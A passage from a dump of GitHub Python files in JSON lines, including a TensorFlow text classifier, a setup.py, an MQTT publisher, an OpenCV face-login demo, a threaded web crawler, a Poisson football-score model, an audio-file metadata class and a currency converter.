tf.data.Dataset.from_tensor_slices(\n tf.cast(test_targets.values, tf.int64),\n)\n\n# val X & Y\nval_text_ds_raw = tf.data.Dataset.from_tensor_slices(\n tf.cast(val_features.values, tf.string)\n)\nval_cat_ds_raw = tf.data.Dataset.from_tensor_slices(\n tf.cast(val_targets.values, tf.int64),\n)\n\n# Model constants.\nmax_features = 20000\nembedding_dim = 128\nsequence_length = 90\n\n# Now that we have our custom standardization, we can instantiate our text\n# vectorization layer. We are using this layer to normalize, split, and map\n# strings to integers, so we set our 'output_mode' to 'int'.\n# Note that we're using the default split function,\n# and the custom standardization defined above.\n# We also set an explicit maximum sequence length, since the CNNs later in our\n# model won't support ragged sequences.\nvectorize_layer = TextVectorization(\n max_tokens=max_features,\n output_mode=\"int\",\n output_sequence_length=sequence_length,\n)\n\nvectorize_layer.adapt(train_features)\nvocab = vectorize_layer.get_vocabulary()\n\ndef convert_text_input(sample):\n text = sample\n text = tf.expand_dims(text, -1)\n return tf.squeeze(vectorize_layer(text))\n\n# Train X\ntrain_text_ds = train_text_ds_raw.map(convert_text_input,\n num_parallel_calls=tf.data.experimental.AUTOTUNE)\n# Test X\ntest_text_ds = test_text_ds_raw.map(convert_text_input,\n num_parallel_calls=tf.data.experimental.AUTOTUNE)\n# Val X\nval_text_ds = val_text_ds_raw.map(convert_text_input,\n num_parallel_calls=tf.data.experimental.AUTOTUNE)\n\ntrain_ds = tf.data.Dataset.zip(\n (\n train_text_ds,\n train_cat_ds_raw\n )\n)\n\ntest_ds = tf.data.Dataset.zip(\n (\n test_text_ds,\n test_cat_ds_raw\n )\n)\n\nval_ds = tf.data.Dataset.zip(\n (\n val_text_ds,\n val_cat_ds_raw\n )\n)\n\n\nbatch_size = 64\nAUTOTUNE = tf.data.experimental.AUTOTUNE\nbuffer_size= train_ds.cardinality().numpy()\n\ntrain_ds = train_ds.shuffle(buffer_size=buffer_size)\\\n .batch(batch_size=batch_size,drop_remainder=True)\\\n .cache()\n\ntest_ds = test_ds.shuffle(buffer_size=buffer_size)\\\n .batch(batch_size=batch_size,drop_remainder=True)\\\n .cache()\n\nval_ds = val_ds.shuffle(buffer_size=buffer_size)\\\n .batch(batch_size=batch_size,drop_remainder=True)\\\n .cache()\n\n\n#\n# ############## MODEL ##################\ninputs_tokens = layers.Input(shape=(sequence_length,), dtype=tf.int32)\nembedding_layer = layers.Embedding(max_features, 256)\nx = embedding_layer(inputs_tokens)\nx = layers.Flatten()(x)\noutputs = layers.Dense(3, activation=\"softmax\")(x)\nmodel = keras.Model(inputs=inputs_tokens, outputs=outputs)\n\nloss_fn = tf.keras.losses.CategoricalCrossentropy(from_logits=True)\nmetric_fn = tf.keras.metrics.CategoricalAccuracy()\nmodel.compile(loss=loss_fn, optimizer=\"adam\", metrics=[metric_fn])\nepochs = 3\n\n# Fit the model using the train and test datasets.\nmodel.fit(train_ds, validation_data=val_ds, epochs=epochs, verbose=1)\n\nmodel.evaluate(test_ds)\n\n#model.save(\"fitted_model\")\n\n\n\n\n\n\n\n\n\n\n\n# loaded_model = keras.models.load_model(\"fitted_model\")\n#\n# loaded_model.evaluate(test_ds)\n#\n# end_to_end_model = keras.Sequential([\n# keras.Input(shape=(1,), dtype=\"string\"),\n# vectorize_layer,\n# loaded_model,\n# keras.layers.Activation('softmax')\n# ])\n#\n# end_to_end_model.compile(\n# loss=tf.keras.losses.SparseCategoricalCrossentropy(from_logits=False), optimizer=\"adam\", metrics=['accuracy']\n# )\n#\n# while True:\n# raw_data = \"Meeting with Matan\"\n# predictions=end_to_end_model.predict([raw_data])\n# print(np.argmax(predictions[0]))\n# raw_data = input(\"Input assignment\")","repo_name":"matanEpel/ai-project---calender","sub_path":"leaner_turkish.py","file_name":"leaner_turkish.py","file_ext":"py","file_size_in_byte":5001,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"66"} +{"seq_id":"20159835464","text":"#!/usr/bin/env python\n\n\"\"\"GeoKey setup.\"\"\"\n\nfrom os.path import join\nfrom setuptools import setup, find_packages\n\nfrom geokey.version import get_version\n\n\nname = 'geokey'\nversion = get_version()\nrepository = join('https://github.com/ExCiteS', name)\n\n\ndef get_install_requires():\n \"\"\"\n Get requirements (ignore links, exclude comments).\n\n Returns\n -------\n list\n Requirements for GeoKey.\n \"\"\"\n requirements = list()\n for line in open('requirements.txt').readlines():\n if line.startswith('#') or line.startswith('git+https') or line == '':\n continue\n requirements.append(line.rstrip())\n return requirements\n\n\nsetup(\n name=name,\n version=version,\n description='Platform for participatory mapping',\n url='http://geokey.org.uk',\n download_url=join(repository, 'tarball', version),\n author='ExCiteS',\n author_email='excites@ucl.ac.uk',\n license='Apache 2.0',\n packages=find_packages(),\n include_package_data=True,\n install_requires=get_install_requires(),\n)\n","repo_name":"ExCiteS/geokey","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1044,"program_lang":"python","lang":"en","doc_type":"code","stars":54,"dataset":"github-code","pt":"66"} +{"seq_id":"21383021434","text":"import csv\n\nstats = 0;\nzeroes = 0;\nlist = []\nwith open('../Data/class.csv', 'r') as inputs:\n r = csv.reader(inputs, delimiter=',')\n for row in r:\n l = [str(row[0]), str(row[1]), str(row[12])]\n if (row[12] == 'lcom*' or row[12] == 'NaN'):\n pass\n else :\n stats += float(row[12])\n if float(row[12]) == 0:\n zeroes = zeroes + 1\n list.append(l)\n\nprint(stats / len(list))\nprint(zeroes)\nprint(len(list))\n\nwith open('../Data/ckjm_lcom.csv', 'w') as outputs:\n w = csv.writer(outputs)\n for i in range(len(list)):\n w.writerow(list[i])\n\n","repo_name":"xavlap/IFT3913TP2","sub_path":"src/filter_ckjm_LCOM.py","file_name":"filter_ckjm_LCOM.py","file_ext":"py","file_size_in_byte":620,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"12558922974","text":"import paho.mqtt.client as mqtt\nfrom time import sleep\nfrom random import randint\nmqttc = mqtt.Client()\nmqttc.connect(\"192.168.1.45\", 1883)\nwhile(1):\n for i in range(200,-1,-1):\n mqttc.publish(\"nickWmV\", i)\n print(str(i))\n sleep(1)\n break\n\nprint(\"FIM DO PROGRAMA\")\n\nmqttc.loop(2)","repo_name":"NicholasWM-zz/Cursos","sub_path":"Python/AULAS/Alura/Python3/Python_1_e_2/IoT/publish-test.py","file_name":"publish-test.py","file_ext":"py","file_size_in_byte":306,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"18150782135","text":"import cv2\nimport glob, os\nimport numpy as np\nfrom PIL import Image\nfrom pkg_resources import resource_stream\nimport skimage.color\n\nimport matplotlib.pyplot as plt\n\ndir = \"./dataset/\"\nos.chdir(dir)\nnp.set_printoptions(suppress=True)\nvideos = [\"picklist_17\",\"picklist_18\",\"picklist_19\",\"picklist_20\",\"picklist_21\",\"picklist_22\"]\nfor video in videos:\n files = sorted(glob.glob(video + '/*.jpg'), key=os.path.getmtime)\n with open(\"../\" + video, 'w') as fi:\n for file in files:\n print(file)\n # if \"blue1\" in file:\n pil_image = Image.open(resource_stream(__name__, dir+file))\n color_image = np.array(Image.open(resource_stream(__name__, dir+file)))\n # color_image = cv2.cvtColor(color_image, cv2.COLOR_BGR2RGB)\n number_of_pixels = color_image.shape[0] * color_image.shape[1]\n hsv_image = skimage.color.rgb2hsv(color_image)\n dims = hsv_image.shape\n hues = []\n saturations = []\n for i in range(0, dims[0]):\n for j in range(0, dims[1]):\n # subsample\n if i % 1 == 0:\n # BGR\n hsv_value = np.array([[hsv_image[i, j, 0],\n hsv_image[i, j, 1],\n hsv_image[i, j, 2]]])\n # rgb_value = np.array([[color_image[i, j, 0],\n # color_image[i, j, 1],\n # color_image[i, j, 2]]]) / 255.0\n hues.append(hsv_value[0][0])\n saturations.append(hsv_value[0][1])\n f, axarr = plt.subplots(2, 2)\n\n axarr[0,0].imshow(color_image)\n h = sum(hues)/len(hues)\n s = sum(saturations)/len(saturations)\n # print(max(set(hues), key=hues.count)) #mode\n # print(max(set(saturations), key=saturations.count)) #mode\n V = np.array([[h, s]])\n origin = np.array([[0, 0, 0], [0, 0, 0]]) # origin point\n # axarr[1].set_xlim([0, 10])\n # axarr[1].set_ylim([0, 10])\n axarr[0,1].quiver(*origin, V[:, 0], V[:, 1], color=['r'], scale=10)\n circle1 = plt.Circle((0, 0), 1 / 21, fill=False)\n axarr[0,1].add_patch(circle1)\n hist_n,hist_bins, _ = axarr[1,0].hist(hues, bins=10, range=(0,1))\n axarr[1,0].set_xlim([0, 1])\n # axarr[1,0].set_title(\"Hue\")\n sat_n,sat_bins, _ = axarr[1,1].hist(saturations, bins=10, range=(0,1))\n # print(hist_n, hist_bins)\n # print(sat_n, sat_bins)\n\n histsat = np.concatenate((hist_n, sat_n))\n mystring = str(histsat).replace(\"[\",\"\").replace(\"]\",\"\").replace(\".\",\"\").replace(\"\\n\",\"\")\n newstring = ' '.join(mystring.split())\n print(newstring)\n fi.write(newstring)\n fi.write(\"\\n\")\n\n axarr[1,1].set_xlim([0, 1])\n # axarr[1,1].set_title(\"Saturation\")\n # plt.show()\n # plt.close()\n\n\n\n","repo_name":"czming/ai-through-symbiosis","sub_path":"frame_to_hsv.py","file_name":"frame_to_hsv.py","file_ext":"py","file_size_in_byte":3144,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"66"} +{"seq_id":"18219097298","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sat Aug 11 15:28:32 2018\n\n@author: ecupl\n\"\"\"\n\n#用颜色直方图判断是否同张脸\nfrom PIL import Image\nfrom functools import reduce\nimport math, operator, cv2, os\n\nos.chdir(\"D:\\\\mywork\\\\test\")\n#创建识别对象\nfaceCascade = cv2.CascadeClassifier(\"D:\\\\python\\\\Lib\\\\site-packages\\\\cv2\\\\data\\\\haarcascade_frontalface_default.xml\")\nloginface = 'face\\\\login.jpg'\nrecogface = 'face\\\\recog.jpg'\n\n#定义抓取图片的函数\ndef makeface(filename):\n print('按任意键进入开始截图\\n摄像头开启后按Z拍照')\n cv2.namedWindow('face')\n cv2.waitKey(0)\n cap = cv2.VideoCapture(0) #调用摄像头\n while(cap.isOpened()):\n ret, img = cap.read() #读取图像\n cv2.waitKey(30)\n #加入框框识别人脸\n peopleface = faceCascade.detectMultiScale(img,scaleFactor=1.2,minNeighbors=3,minSize=(10,10),flags=cv2.CASCADE_SCALE_IMAGE)\n for x,y,w,h in peopleface:\n cv2.rectangle(img,(x,y),(x+w,y+h),(0,255,0),1)\n if ret==True:\n cv2.imshow('face',img)\n k=cv2.waitKey(30)\n if k==ord('z') or k==ord('Z'): #判断是否为按了Z\n cv2.imwrite(filename,img)\n break\n cv2.waitKey(500)\n face = Image.open(filename)\n face1 = face.crop((x,y,x+w,y+h))\n face2 = face1.resize((200,200),Image.ANTIALIAS)\n face2.save(filename)\n cap.release()\n cv2.destroyAllWindows()\n\n\nif os.path.exists('face\\\\recog.jpg'):\n makeface(loginface)\n pic1 = Image.open('face\\\\recog.jpg')\n pic2 = Image.open('face\\\\login.jpg')\n h1=pic1.histogram() #16等分,3组\n h2=pic2.histogram()\n diff = math.sqrt(reduce(operator.add, list(map(lambda a,b:(a-b)**2,h1,h2)))/len(h1))\n if diff<=100:\n print(\"检验通过。diff=%.2f\"%diff)\n else:\n print(\"人脸错误,无法登录。diff=%.2f\"%diff)\nelse:\n makeface(recogface)\n print('预测人脸图像拍摄成功。')\n#import matplotlib.pyplot as plt\n#plt.hist(h2,bins=50) \n#另一种diff计算方式\n#diff2 = (sum(list(map(lambda a,b:(a-b)**2,h1,h2)))/len(h1))**0.5\n\n\n\n","repo_name":"shoucangjia1qu/study_python","sub_path":"face_login(study0811).py","file_name":"face_login(study0811).py","file_ext":"py","file_size_in_byte":2125,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"19133304634","text":"import queue\nimport random\nimport threading\nimport time\nimport requests\nfrom resources import urls\nfrom bs4 import BeautifulSoup\nfrom concurrent.futures import ThreadPoolExecutor, as_completed\n\"\"\"\n可以用:time curl http://ip:port/xxx 来测试响应时间\n\"\"\"\n\n\n\ndef craw(url):\n \"\"\"根据传入的url发送请求,获取页面内容\"\"\"\n headers = {\n \"User-Agent\": \"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36 Edg/115.0.1901.203\"\n }\n r = requests.get(url, headers=headers)\n # print(url, len(r.text))\n return r.text\n\n\ndef parse(html):\n \"\"\"解析内容\"\"\"\n soup = BeautifulSoup(html, \"html.parser\")\n links = soup.find_all(\"a\", class_=\"post-item-title\")\n return [(link[\"href\"], link.get_text()) for link in links]\n\n\nclass base_multi_thread:\n\n def multi_thread(self, num=-1):\n threads = []\n for url in self.urls[:num]:\n threads.append(\n threading.Thread(target=craw, args=(url,))\n )\n\n for thread in threads:\n thread.start()\n\n for thread in threads:\n thread.join()\n\n\nclass ProducerConsumer:\n def __init__(self, url_queue, html_queue):\n self.url_queue = url_queue\n self.html_queue = html_queue\n\n def do_craw(self):\n count = 0\n while True:\n url = self.url_queue.get()\n if not url and count < 3:\n count += 1\n continue\n if count >= 3:\n break\n html = craw(url)\n self.html_queue.put(html)\n time.sleep(random.randint(1, 2))\n\n def do_parse(self, fout):\n count = 0\n while True:\n html = self.html_queue.get()\n if not html and count < 3:\n count += 1\n continue\n if count >= 3:\n break\n results = parse(html)\n for result in results:\n fout.write(str(result) + \"\\n\")\n time.sleep(random.randint(1, 2))\n\n def run(self):\n for url in urls:\n self.url_queue.put(url)\n print(self.url_queue.qsize())\n\n for idx in range(3):\n t = threading.Thread(target=self.do_craw, name=f\"craw{idx}\")\n t.start()\n\n fout = open(\"result.txt\", \"w\")\n for idx in range(2):\n t = threading.Thread(target=self.do_parse, args=(fout,), name=f\"parse{idx}\")\n t.start()\n\n\nclass ThreadPoolObj:\n\n def __init__(self):\n pass\n\n def method1(self):\n \"\"\"会按顺序打印结果\"\"\"\n with ThreadPoolExecutor() as pool:\n results = pool.map(craw, urls)\n for result in results:\n print(result)\n\n def method2(self):\n \"\"\"哪个线程先结束就先打印哪个线程的结果\"\"\"\n with ThreadPoolExecutor() as pool:\n futures = [pool.submit(craw, url) for url in urls]\n for future in futures:\n print(future.result())\n for future in as_completed(futures):\n print(future.result())\n\n\nif __name__ == '__main__':\n url_queue = queue.Queue()\n html_queue = queue.Queue()\n PC = ProducerConsumer(url_queue, html_queue)\n PC.run()\n","repo_name":"moye233057/moye_notebook","sub_path":"MultiProcess/实战/多线程.py","file_name":"多线程.py","file_ext":"py","file_size_in_byte":3279,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"34626798031","text":"import csv\nfrom collections import defaultdict\nfrom random import uniform\nimport scipy.optimize as sc\nfrom math import exp, factorial\n\nvariables = {}\nind_variables = {}\nteams = set()\nfilename = 'premierleague_scores.csv'\nwith open(filename, newline='') as csvfile:\n _reader = csv.reader(csvfile, delimiter=';')\n next(_reader)\n for row in _reader:\n teams.add(row[0])\n\nfor team in teams:\n variables[(team, 'A')] = [0, 0]\n variables[(team, 'D')] = [0, 0]\n\ndef find_prob(team_a, team_d, k):\n return (pow(variables[(team_a, 'A')], k)*exp(-variables[(team_a, 'A')])+\n pow(variables[(team_d, 'D')], k)*exp(-variables[(team_d, 'D')]))/(2*factorial(k))\n # sm = 0\n # for i in range(2*k+1):\n # sm += pow(variables[(team_a, 'A')], i)*exp(-variables[(team_a, 'A')])*\\\n # pow(variables[(team_d, 'D')], 2*k-i)*exp(-variables[(team_d, 'D')])\\\n # /(factorial(i)*factorial(2*k-i))\n # return sm\n\nwith open(filename, newline='') as csvfile:\n _reader = csv.reader(csvfile, delimiter=';')\n next(_reader)\n for row in _reader:\n variables[(row[0], 'A')][0] += int(row[2])\n variables[(row[0], 'A')][1] += 1\n variables[(row[1], 'D')][0] += int(row[2])\n variables[(row[1], 'D')][1] += 1\n variables[(row[1], 'A')][0] += int(row[3])\n variables[(row[1], 'A')][1] += 1\n variables[(row[0], 'D')][0] += int(row[3])\n variables[(row[0], 'D')][1] += 1\n\nfor v in variables:\n print(v, variables[v], variables[v][0]/variables[v][1])\n variables[v] = variables[v][0]/variables[v][1]\n\n\n# matches = [('Leicester City', 'Everton', '2-1'),\n# ('Manchester United', 'Aston Villa', '2-2'),\n# ('Norwich City', 'Arsenal Londyn', '2-2'),\n# ('Wolverhampton', 'Sheffield United', '1-1'),\n# ('Southampton FC', 'Watford FC', '2-1'),\n# ('Burnley FC', 'Crystal Palace', '0-2'),\n# ('Chelsea Londyn', 'West Ham United', '0-1'),\n# ('Liverpool FC', 'Brighton & Hove', '2-1'),\n# ('Tottenham Hotspur', 'AFC Bournemouth', '3-2'),\n# ('Newcastle United', 'Manchester City', '2-2')]\nprint(teams)\n# matches = [('PSG', 'Lyon', '0-1'),\n# ('Lille', 'Bordeaux', '2-1'),\n# ('Brest', 'Reims', '2-1'),\n# ('Lorient', 'Nimes', '3-0'),\n# ('Nantes', 'Dijon', '1-1'),\n# ('Strasbourg', 'Metz', '2-2'),\n# ('Nice', 'Rennes', '0-1'),\n# ('Lens', 'Montpellier', '2-3'),\n# ('Marsylia', 'Monaco', '2-1'),\n# ('St. Etienne', 'Angers', '0-0')]\n\n# matches = [('Lechia', 'Wisła Płock', '0-1'),\n# ('Raków', 'Jagiellonia', '3-2'),\n# ('Stal', 'Lech', '1-1'),\n# ('Wisła Kraków', 'Legia', '1-2'),\n# ('Górnik', 'Cracovia', '0-2'),\n# ('Warta', 'Pogoń', '1-2'),\n# ('Zagłębie', 'Śląsk', '2-1'),\n# ('Podbeskidzie', 'Piast', '0-5')]\n\n# matches = [('Schalke', 'Freiburg', '0-2'),\n# ('Bremen', 'Dortmund', '1-2'),\n# ('Hertha', 'Mainz', '0-0'),\n# ('Stuttgart', 'Union Berlin', '2-2'),\n# ('Frankfurt', 'Moenchengladbach', '3-3'),\n# ('Bayern', 'Wolfsburg'), ('Bielefeld', 'Augsburg'), ('FC Koeln', 'Leverkusen'), ('Hoffenheim', 'RB Lipsk')]\n\n# matches = [('RB Salzburg', 'LASK Linz', '3-1'),\n# ('SK Rapid Wiedeń', 'Swarovski Tirol', '0-3'),\n# ('Wolfsberger AC', 'FK Austria Wiedeń', '3-2'),\n# ('SV Ried', 'SC Rheindorf Altach', '1-4'),\n# ('SKN Sankt Pölten', 'Hartberg', '2-2'),\n# ('SK Sturm Graz', 'Admira', '3-0')]\n#\n# matches = [('Celtic Glasgow FC', 'Kilmarnock FC', '2-0'),\n# ('Dundee United FC', 'Glasgow Rangers FC', '1-2'),\n# ('Saint Johnstone FC', 'Livingston FC', '1-2'),\n# ('Motherwell FC', 'Saint Mirren FC', '0-1'),\n# ('Hamilton Academicals FC',\t'Hibernian FC', '0-4'),\n# ('Aberdeen FC', 'Ross County', '2-0')]\n\n\nmatches = []\nwith open('premierleague_scores.csv', newline='') as csvfile:\n _reader = csv.reader(csvfile, delimiter=';')\n next(_reader)\n for row in _reader:\n matches.append([(row[0], row[1], int(row[2]), int(row[3]))])\n\ncounts_102 = [0, 0, 0]\ncounts_numgoals = [0,0,0,0,0]\ncounts_intervals = [0,0,0,0]\ncounts_singles = [0,0,0,0]\ncounts_exacts = [0,0,0,0,0,0,0,0]\n\ncounts_12 = [0,0,0,0]\nfor m in matches:\n scores = []\n scores_numgoals = defaultdict(float)\n scores_102 = defaultdict(float)\n scores_intervals = defaultdict(float)\n scores_teams = defaultdict(int)\n scores_1 = defaultdict(float)\n scores_2 = defaultdict(float)\n scores_12 = defaultdict(float)\n for i in range(15):\n for j in range(15):\n p = find_prob(m[0][0], m[0][1], i)*find_prob(m[0][1], m[0][0], j)\n if i != j:\n scores_12[12] += p\n else:\n scores_12[0] += p\n t = 0.745\n if scores_12[12] >= t and m[0][2] != m[0][3]:\n counts_12[0] += 1\n elif scores_12[12] < t and m[0][2] != m[0][3]:\n counts_12[1] += 1\n elif scores_12[12] < t and m[0][2] == m[0][3]:\n counts_12[2] += 1\n else:\n counts_12[3] += 1\n # scores.append(((i, j), p))\n # scores_numgoals[(i+j)] += p\n # if i+j == 0: scores_intervals['0'] += p\n # elif i+j == 1: scores_intervals['1'] += p\n # elif i+j == 2: scores_intervals['2'] += p\n # else: scores_intervals['3+'] += p\n # if i > j: scores_102[1] += p\n # elif i == j: scores_102[0] += p\n # else: scores_102[2] += p\n # if i == 0: scores_1['0'] += p\n # elif i == 1: scores_1['1'] += p\n # elif i == 2: scores_1['2'] += p\n # else: scores_1['3+'] += p\n # if j == 0: scores_2['0'] += p\n # elif j == 1: scores_2['1'] += p\n # elif j == 2: scores_2['2'] += p\n # else: scores_2['3+'] += p\n # _scores_102 = [scores_102[1], scores_102[0], scores_102[2]]\n # _scores_102.sort(reverse=True)\n # _scores_numgoals = [scores_numgoals[0], scores_numgoals[1], scores_numgoals[2],\n # scores_numgoals[3], scores_numgoals[4], scores_numgoals[5],\n # scores_numgoals[6], scores_numgoals[7]]\n # _scores_numgoals.sort(reverse=True)\n # _scores_intervals = [scores_intervals['0'], scores_intervals['1'], scores_intervals['2'], scores_intervals['3+']]\n # _scores_intervals.sort(reverse=True)\n # _scores_1 = [scores_1['0'], scores_1['1'], scores_1['2'], scores_1['3+']]\n # _scores_2 = [scores_2['0'], scores_2['1'], scores_2['2'], scores_2['3+']]\n # _scores_1.sort(reverse=True)\n # _scores_2.sort(reverse=True)\n # if max(_scores_102) > 0.37 and max(_scores_102) < 0.9:\n # if int(m[0][2]) > int(m[0][3]):\n # counts_102[_scores_102.index(scores_102[1])] += 1\n # elif int(m[0][2]) == int(m[0][3]):\n # counts_102[_scores_102.index(scores_102[0])] += 1\n # else:\n # counts_102[_scores_102.index(scores_102[2])] += 1\n # try:\n # counts_numgoals[_scores_numgoals.index(scores_numgoals[int(m[0][2]) + int(m[0][3])])] += 1\n # except: pass\n # if int(m[0][2]) + int(m[0][3]) == 0:\n # counts_intervals[_scores_intervals.index(scores_intervals['0'])] += 1\n # elif int(m[0][2]) + int(m[0][3]) == 1:\n # counts_intervals[_scores_intervals.index(scores_intervals['1'])] += 1\n # elif int(m[0][2]) + int(m[0][3]) == 2:\n # counts_intervals[_scores_intervals.index(scores_intervals['2'])] += 1\n # else:\n # counts_intervals[_scores_intervals.index(scores_intervals['3+'])] += 1\n # if int(m[0][2]) == 0:\n # counts_singles[_scores_1.index(scores_1['0'])] += 1\n # if int(m[0][2]) == 1:\n # counts_singles[_scores_1.index(scores_1['1'])] += 1\n # if int(m[0][2]) == 2:\n # counts_singles[_scores_1.index(scores_1['2'])] += 1\n # if int(m[0][2]) >= 3:\n # counts_singles[_scores_1.index(scores_1['3+'])] += 1\n # if int(m[0][3]) == 0:\n # counts_singles[_scores_2.index(scores_2['0'])] += 1\n # if int(m[0][3]) == 1:\n # counts_singles[_scores_2.index(scores_2['1'])] += 1\n # if int(m[0][3]) == 2:\n # counts_singles[_scores_2.index(scores_2['2'])] += 1\n # if int(m[0][3]) >= 3:\n # counts_singles[_scores_2.index(scores_2['3+'])] += 1\n # scores.sort(key= lambda x: -x[1])\n # for i in range(8):\n # if scores[i][0] == (int(m[0][2]), int(m[0][3])):\n # counts_exacts[i] += 1\n # break\n\n\n # scores.sort(key= lambda x: -x[1])\n # print(m)\n # print('match score:')\n # #print(sum(map(lambda x: x[1], scores)))\n # for s in scores[:7]:\n # print(s)\n # print('sum of goals:')\n # for i in range(7):\n # print(i, scores_uo[i])\n # print('p1: ' + str(scores_102[1]) + ', p0: ' + str(scores_102[0]) + ', p2: ' + str(scores_102[2]))\n # print('********************')\n\n# print(counts_102)\n# print(counts_numgoals)\n# print(counts_intervals)\n# print(counts_singles)\n# print(counts_exacts)\n\nprint(counts_12)\nimport statsmodels.stats.proportion as sm\nprint(counts_12[0]/(counts_12[0]+counts_12[3]))\nprint(sm.proportion_confint(counts_12[0], counts_12[0]+counts_12[3]))","repo_name":"BG1992/Betting","sub_path":"bipoisson_bt.py","file_name":"bipoisson_bt.py","file_ext":"py","file_size_in_byte":9347,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"24871469990","text":"#!/usr/bin/env python\n# coding=utf-8\n\n\"\"\"\nA class representing an audio file.\n\"\"\"\n\nimport os\n\nimport aeneas.globalfunctions as gf\nfrom aeneas.ffprobewrapper import FFPROBEWrapper\nfrom aeneas.logger import Logger\n\n__author__ = \"Alberto Pettarin\"\n__copyright__ = \"\"\"\n Copyright 2012-2013, Alberto Pettarin (www.albertopettarin.it)\n Copyright 2013-2015, ReadBeyond Srl (www.readbeyond.it)\n \"\"\"\n__license__ = \"GNU AGPL v3\"\n__version__ = \"1.0.0\"\n__email__ = \"aeneas@readbeyond.it\"\n__status__ = \"Production\"\n\nclass AudioFile(object):\n \"\"\"\n A class representing an audio file.\n\n The properties of the audio file\n (length, format, etc.)\n will be set by the constructor\n invoking an audio file probe.\n (Currently,\n :class:`aeneas.ffprobewrapper.FFPROBEWrapper`\n )\n\n :param file_path: the path to the audio file\n :type file_path: string (path)\n :param logger: the logger object\n :type logger: :class:`aeneas.logger.Logger`\n \"\"\"\n\n TAG = \"AudioFile\"\n\n def __init__(self, file_path, logger=None):\n self.logger = logger\n if self.logger == None:\n self.logger = Logger()\n self.file_path = file_path\n self.file_size = None\n self.audio_length = None\n self.audio_format = None\n self.audio_sample_rate = None\n self.audio_channels = None\n self._read_properties()\n\n def _log(self, message, severity=Logger.DEBUG):\n self.logger.log(message, severity, self.TAG)\n\n def __str__(self):\n accumulator = \"\"\n accumulator += \"File path: %s\\n\" % self.file_path\n accumulator += \"File size (bytes): %s\\n\" % gf.safe_int(self.file_size)\n accumulator += \"Audio length (s): %s\\n\" % gf.safe_float(self.audio_length)\n accumulator += \"Audio format: %s\\n\" % self.audio_format\n accumulator += \"Audio sample rate: %s\\n\" % gf.safe_int(self.audio_sample_rate)\n accumulator += \"Audio channels: %s\" % gf.safe_int(self.audio_channels)\n return accumulator\n\n @property\n def file_path(self):\n \"\"\"\n The path of the audio file.\n\n :rtype: string\n \"\"\"\n return self.__file_path\n @file_path.setter\n def file_path(self, file_path):\n self.__file_path = file_path\n\n @property\n def file_size(self):\n \"\"\"\n The size, in bytes, of the audio file.\n\n :rtype: int\n \"\"\"\n return self.__file_size\n @file_size.setter\n def file_size(self, file_size):\n self.__file_size = file_size\n\n @property\n def audio_length(self):\n \"\"\"\n The length, in seconds, of the audio file.\n\n :rtype: float\n \"\"\"\n return self.__audio_length\n @audio_length.setter\n def audio_length(self, audio_length):\n self.__audio_length = audio_length\n\n @property\n def audio_format(self):\n \"\"\"\n The format of the audio file.\n\n :rtype: string\n \"\"\"\n return self.__audio_format\n @audio_format.setter\n def audio_format(self, audio_format):\n self.__audio_format = audio_format\n\n @property\n def audio_sample_rate(self):\n \"\"\"\n The sample rate of the audio file.\n\n :rtype: int\n \"\"\"\n return self.__audio_sample_rate\n @audio_sample_rate.setter\n def audio_sample_rate(self, audio_sample_rate):\n self.__audio_sample_rate = audio_sample_rate\n\n @property\n def audio_channels(self):\n \"\"\"\n The number of channels of the audio file.\n\n :rtype: int\n \"\"\"\n return self.__audio_channels\n @audio_channels.setter\n def audio_channels(self, audio_channels):\n self.__audio_channels = audio_channels\n\n def _read_properties(self):\n \"\"\"\n Populate this object by reading\n the audio properties of the file at the given path.\n\n Currently this function uses\n :class:`aeneas.ffprobewrapper.FFPROBEWrapper`\n to get the audio file properties.\n \"\"\"\n\n self._log(\"Reading properties\")\n\n # check the file can be read\n if not os.path.isfile(self.file_path):\n msg = \"File '%s' cannot be read\" % self.file_path\n self._log(msg, Logger.CRITICAL)\n raise OSError(msg)\n\n # get the file size\n self._log(\"Getting file size for '%s'\" % self.file_path)\n self.file_size = os.path.getsize(self.file_path)\n self._log(\"File size for '%s' is '%d'\" % (self.file_path, self.file_size))\n\n # get the audio properties\n self._log(\"Reading properties with FFPROBEWrapper...\")\n prober = FFPROBEWrapper(logger=self.logger)\n properties = prober.read_properties(self.file_path)\n self._log(\"Reading properties with FFPROBEWrapper... done\")\n\n # save relevant properties in results inside the audiofile object\n self.audio_length = gf.safe_float(properties[FFPROBEWrapper.STDOUT_DURATION])\n self._log(\"Stored audio_length: '%s'\" % self.audio_length)\n self.audio_format = properties[FFPROBEWrapper.STDOUT_CODEC_NAME]\n self._log(\"Stored audio_format: '%s'\" % self.audio_format)\n self.audio_sample_rate = gf.safe_int(properties[FFPROBEWrapper.STDOUT_SAMPLE_RATE])\n self._log(\"Stored audio_sample_rate: '%s'\" % self.audio_sample_rate)\n self.audio_channels = gf.safe_int(properties[FFPROBEWrapper.STDOUT_CHANNELS])\n self._log(\"Stored audio_channels: '%s'\" % self.audio_channels)\n\n\n\n","repo_name":"garyfeng/aeneas","sub_path":"aeneas/audiofile.py","file_name":"audiofile.py","file_ext":"py","file_size_in_byte":5466,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"66"} +{"seq_id":"30068461293","text":"'''\nEin einfacher Währungsumrechner. Musterlösung\nMaximilian\n29.01.2023\n'''\n\n#Funktion, die das Umrechnen übernimmt\ndef usd(zahl):\n erg = zahl * 1.0869\n return erg\n\nwhile True:\n #prüft, ob der Nutzer eine Fehleingabe getätigt hat\n try:\n print(\"---------------------------------------------------------------------\")\n zahl = float(input(\"| Wie viel Euro willst du in USD umrechnen? \"))\n print(\"---------------------------------------------------------------------\")\n print(f\"|Originale Eingabe: {zahl:^20.2f}€ | \" , f\" Umgerechnet in Dollar: 